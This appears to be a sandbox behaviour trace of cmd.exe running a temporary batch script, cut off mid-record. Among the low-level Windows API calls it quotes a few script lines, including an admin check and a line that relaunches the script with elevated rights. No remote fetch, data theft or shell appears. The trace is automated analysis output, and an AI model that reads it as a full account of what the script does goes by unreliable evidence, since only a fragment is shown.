(lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0177.838] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0177.838] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.838] SetFilePointer (in: hFile=0x90, lDistanceToMove=5386, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x150a [0177.838] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.838] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x150a [0177.838] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.838] SetFilePointer (in: hFile=0x90, lDistanceToMove=5454, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x154e [0177.838] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Elevate script as admin and pass arguments and preventing loop\r\n", cbMultiByte=68, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Elevate script as admin and pass arguments and preventing loop\r\n======================================================================\r\n") returned 68 [0177.839] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.839] GetFileType (hFile=0x90) returned 0x1 [0177.839] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.839] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x154e [0177.839] GetProcessHeap () returned 0x19a8f1e0000 [0177.839] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.839] GetProcessHeap () returned 0x19a8f1e0000 [0177.840] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.840] _tell (_FileHandle=3) returned 5454 [0177.840] _close (_FileHandle=3) returned 0 [0177.840] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0177.840] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0177.840] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.840] SetFilePointer (in: hFile=0x90, lDistanceToMove=5454, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x154e [0177.840] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.840] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x154e [0177.840] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.841] SetFilePointer (in: hFile=0x90, lDistanceToMove=5456, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1550 [0177.841] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n Elevate script as admin and pass arguments and preventing loop\r\n======================================================================\r\n") returned 2 [0177.841] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.841] GetFileType (hFile=0x90) returned 0x1 [0177.841] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.841] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1550 [0177.841] GetProcessHeap () returned 0x19a8f1e0000 [0177.841] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.841] GetProcessHeap () returned 0x19a8f1e0000 [0177.842] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.842] _tell (_FileHandle=3) returned 5456 [0177.842] _close (_FileHandle=3) returned 0 [0177.842] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0177.842] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0177.842] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.842] SetFilePointer (in: hFile=0x90, lDistanceToMove=5456, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1550 [0177.842] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.842] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1550 [0177.843] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.843] SetFilePointer (in: hFile=0x90, lDistanceToMove=5475, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1563 [0177.843] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%nul1% fltmc || (\r\n", cbMultiByte=19, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="%nul1% fltmc || (\r\nas admin and pass arguments and preventing loop\r\n======================================================================\r\n") returned 19 [0177.843] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.843] GetFileType (hFile=0x90) returned 0x1 [0177.843] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.843] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1563 [0177.843] GetProcessHeap () returned 0x19a8f1e0000 [0177.843] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.843] GetProcessHeap () returned 0x19a8f1e0000 [0177.843] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0177.843] GetProcessHeap () returned 0x19a8f1e0000 [0177.843] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6e0 [0177.843] GetEnvironmentVariableW (in: lpName="nul1", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0177.843] GetProcessHeap () returned 0x19a8f1e0000 [0177.843] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0177.843] GetProcessHeap () returned 0x19a8f1e0000 [0177.844] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0177.844] GetProcessHeap () returned 0x19a8f1e0000 [0177.845] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.845] GetProcessHeap () returned 0x19a8f1e0000 [0177.845] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0fb0 [0177.845] GetProcessHeap () returned 0x19a8f1e0000 [0177.845] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd60 [0177.845] _wcsicmp (_String1="FOR", _String2="fltmc") returned 3 [0177.845] _wcsicmp (_String1="FOR/?", _String2="fltmc") returned 3 [0177.845] _wcsicmp (_String1="IF", _String2="fltmc") returned 3 [0177.845] _wcsicmp (_String1="IF/?", _String2="fltmc") returned 3 [0177.845] _wcsicmp (_String1="REM", _String2="fltmc") returned 12 [0177.845] _wcsicmp (_String1="REM/?", _String2="fltmc") returned 12 [0177.845] GetProcessHeap () returned 0x19a8f1e0000 [0177.845] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee790 [0177.845] GetProcessHeap () returned 0x19a8f1e0000 [0177.845] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb980 [0177.846] GetProcessHeap () returned 0x19a8f1e0000 [0177.846] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec760 [0177.846] GetProcessHeap () returned 0x19a8f1e0000 [0177.846] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0177.846] GetProcessHeap () returned 0x19a8f1e0000 [0177.846] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0177.846] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.846] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1563 [0177.846] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efece0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efece0*=0x1fff, lpOverlapped=0x0) returned 1 [0177.846] SetFilePointer (in: hFile=0x90, lDistanceToMove=5570, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15c2 [0177.846] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not defined _elev %psc% \"start cmd.exe -arg '/c \\\"!_PSarg:'=''!\\\"' -verb runas\" && exit /b\r\n", cbMultiByte=95, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if not defined _elev %psc% \"start cmd.exe -arg '/c \\\"!_PSarg:'=''!\\\"' -verb runas\" && exit /b\r\n===========================================\r\n") returned 95 [0177.846] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.846] GetFileType (hFile=0x90) returned 0x1 [0177.846] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.846] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15c2 [0177.846] GetProcessHeap () returned 0x19a8f1e0000 [0177.846] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.846] GetProcessHeap () returned 0x19a8f1e0000 [0177.847] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0177.847] GetProcessHeap () returned 0x19a8f1e0000 [0177.847] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd40 [0177.847] GetEnvironmentVariableW (in: lpName="psc", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xe [0177.847] GetProcessHeap () returned 0x19a8f1e0000 [0177.847] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd40) returned 1 [0177.847] GetProcessHeap () returned 0x19a8f1e0000 [0177.847] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0177.847] GetProcessHeap () returned 0x19a8f1e0000 [0177.847] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.847] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0177.848] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0177.848] _wcsicmp (_String1="IF", _String2="if") returned 0 [0177.848] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0177.848] GetProcessHeap () returned 0x19a8f1e0000 [0177.848] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0177.848] GetProcessHeap () returned 0x19a8f1e0000 [0177.848] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec800 [0177.848] GetProcessHeap () returned 0x19a8f1e0000 [0177.848] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0177.848] GetProcessHeap () returned 0x19a8f1e0000 [0177.848] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb9e0, Size=0x1a) returned 0x19a8f1eb860 [0177.848] GetProcessHeap () returned 0x19a8f1e0000 [0177.848] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb860) returned 0x1a [0177.848] _wcsicmp (_String1="not", _String2="/I") returned 63 [0177.848] GetProcessHeap () returned 0x19a8f1e0000 [0177.848] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0177.848] GetProcessHeap () returned 0x19a8f1e0000 [0177.848] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb20 [0177.848] _wcsicmp (_String1="ERRORLEVEL", _String2="not") returned -9 [0177.848] _wcsicmp (_String1="EXIST", _String2="not") returned -9 [0177.848] _wcsicmp (_String1="CMDEXTVERSION", _String2="not") returned -11 [0177.848] _wcsicmp (_String1="DEFINED", _String2="not") returned -10 [0177.848] _wcsicmp (_String1="NOT", _String2="not") returned 0 [0177.848] GetProcessHeap () returned 0x19a8f1e0000 [0177.848] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0177.849] GetProcessHeap () returned 0x19a8f1e0000 [0177.849] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb710 [0177.849] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0177.849] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0177.849] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0177.849] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0177.849] GetProcessHeap () returned 0x19a8f1e0000 [0177.849] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb9e0 [0177.849] GetProcessHeap () returned 0x19a8f1e0000 [0177.849] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb740 [0177.850] GetProcessHeap () returned 0x19a8f1e0000 [0177.850] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb740, Size=0x1e) returned 0x19a8f1eb800 [0177.850] GetProcessHeap () returned 0x19a8f1e0000 [0177.850] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x1e [0177.850] _wcsicmp (_String1="powershell.exe", _String2=")") returned 71 [0177.850] _wcsicmp (_String1="FOR", _String2="powershell.exe") returned -10 [0177.850] _wcsicmp (_String1="FOR/?", _String2="powershell.exe") returned -10 [0177.850] _wcsicmp (_String1="IF", _String2="powershell.exe") returned -7 [0177.850] _wcsicmp (_String1="IF/?", _String2="powershell.exe") returned -7 [0177.850] _wcsicmp (_String1="REM", _String2="powershell.exe") returned 2 [0177.850] _wcsicmp (_String1="REM/?", _String2="powershell.exe") returned 2 [0177.850] GetProcessHeap () returned 0x19a8f1e0000 [0177.850] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0177.850] GetProcessHeap () returned 0x19a8f1e0000 [0177.850] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e0cb0 [0177.850] GetProcessHeap () returned 0x19a8f1e0000 [0177.850] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x84) returned 0x19a8f1eaed0 [0177.850] GetProcessHeap () returned 0x19a8f1e0000 [0177.850] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0177.850] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0177.850] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0177.850] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0177.850] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0177.850] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0177.851] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0177.851] GetProcessHeap () returned 0x19a8f1e0000 [0177.851] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0177.851] GetProcessHeap () returned 0x19a8f1e0000 [0177.851] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6b0 [0177.851] GetProcessHeap () returned 0x19a8f1e0000 [0177.851] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec7c0 [0177.851] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0177.851] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.851] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15c2 [0177.851] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efec80, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efec80*=0x1fff, lpOverlapped=0x0) returned 1 [0177.851] SetFilePointer (in: hFile=0x90, lDistanceToMove=5581, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15cd [0177.851] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%nceline%\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="%nceline%\r\nned _elev %psc% \"start cmd.exe -arg '/c \\\"!_PSarg:'=''!\\\"' -verb runas\" && exit /b\r\n===========================================\r\n") returned 11 [0177.851] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.851] GetFileType (hFile=0x90) returned 0x1 [0177.851] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.851] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15cd [0177.851] GetProcessHeap () returned 0x19a8f1e0000 [0177.852] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.852] GetProcessHeap () returned 0x19a8f1e0000 [0177.852] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0177.852] GetProcessHeap () returned 0x19a8f1e0000 [0177.852] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb8f0 [0177.852] GetEnvironmentVariableW (in: lpName="nceline", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x22 [0177.852] GetProcessHeap () returned 0x19a8f1e0000 [0177.852] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0177.852] GetProcessHeap () returned 0x19a8f1e0000 [0177.853] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0177.853] GetProcessHeap () returned 0x19a8f1e0000 [0177.853] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.853] GetProcessHeap () returned 0x19a8f1e0000 [0177.853] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0177.853] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0177.853] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0177.853] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0177.853] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0177.853] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0177.853] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0177.853] GetProcessHeap () returned 0x19a8f1e0000 [0177.853] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0177.854] GetProcessHeap () returned 0x19a8f1e0000 [0177.854] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0177.854] GetProcessHeap () returned 0x19a8f1e0000 [0177.854] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecb40 [0177.854] GetProcessHeap () returned 0x19a8f1e0000 [0177.854] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0177.854] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.854] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.854] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.854] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.854] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.854] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.854] GetProcessHeap () returned 0x19a8f1e0000 [0177.854] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0177.854] GetProcessHeap () returned 0x19a8f1e0000 [0177.854] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb920 [0177.854] GetProcessHeap () returned 0x19a8f1e0000 [0177.854] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x34) returned 0x19a8f1e0a70 [0177.854] GetProcessHeap () returned 0x19a8f1e0000 [0177.854] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0177.854] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0177.854] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0177.854] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0177.854] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0177.855] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0177.855] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0177.855] GetProcessHeap () returned 0x19a8f1e0000 [0177.855] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0177.855] GetProcessHeap () returned 0x19a8f1e0000 [0177.855] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb740 [0177.855] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.855] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15cd [0177.855] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebf0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebf0*=0x1fff, lpOverlapped=0x0) returned 1 [0177.855] SetFilePointer (in: hFile=0x90, lDistanceToMove=5619, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15f3 [0177.855] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo This script needs admin rights.\r\n", cbMultiByte=38, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo This script needs admin rights.\r\nexe -arg '/c \\\"!_PSarg:'=''!\\\"' -verb runas\" && exit /b\r\n===========================================\r\n") returned 38 [0177.855] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.855] GetFileType (hFile=0x90) returned 0x1 [0177.855] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.855] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15f3 [0177.855] GetProcessHeap () returned 0x19a8f1e0000 [0177.855] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.855] GetProcessHeap () returned 0x19a8f1e0000 [0177.856] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.856] GetProcessHeap () returned 0x19a8f1e0000 [0177.856] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0177.856] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.856] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.856] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.856] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.856] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.856] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.856] GetProcessHeap () returned 0x19a8f1e0000 [0177.856] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0177.856] GetProcessHeap () returned 0x19a8f1e0000 [0177.856] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb770 [0177.856] GetProcessHeap () returned 0x19a8f1e0000 [0177.856] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x52) returned 0x19a8f1f8940 [0177.857] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.857] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15f3 [0177.857] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebc0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebc0*=0x1fff, lpOverlapped=0x0) returned 1 [0177.857] SetFilePointer (in: hFile=0x90, lDistanceToMove=5697, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1641 [0177.857] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo To do so, right click on this script and select 'Run as administrator'.\r\n", cbMultiByte=78, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo To do so, right click on this script and select 'Run as administrator'.\r\nnas\" && exit /b\r\n===========================================\r\n") returned 78 [0177.857] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.857] GetFileType (hFile=0x90) returned 0x1 [0177.857] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.857] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1641 [0177.857] GetProcessHeap () returned 0x19a8f1e0000 [0177.857] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, 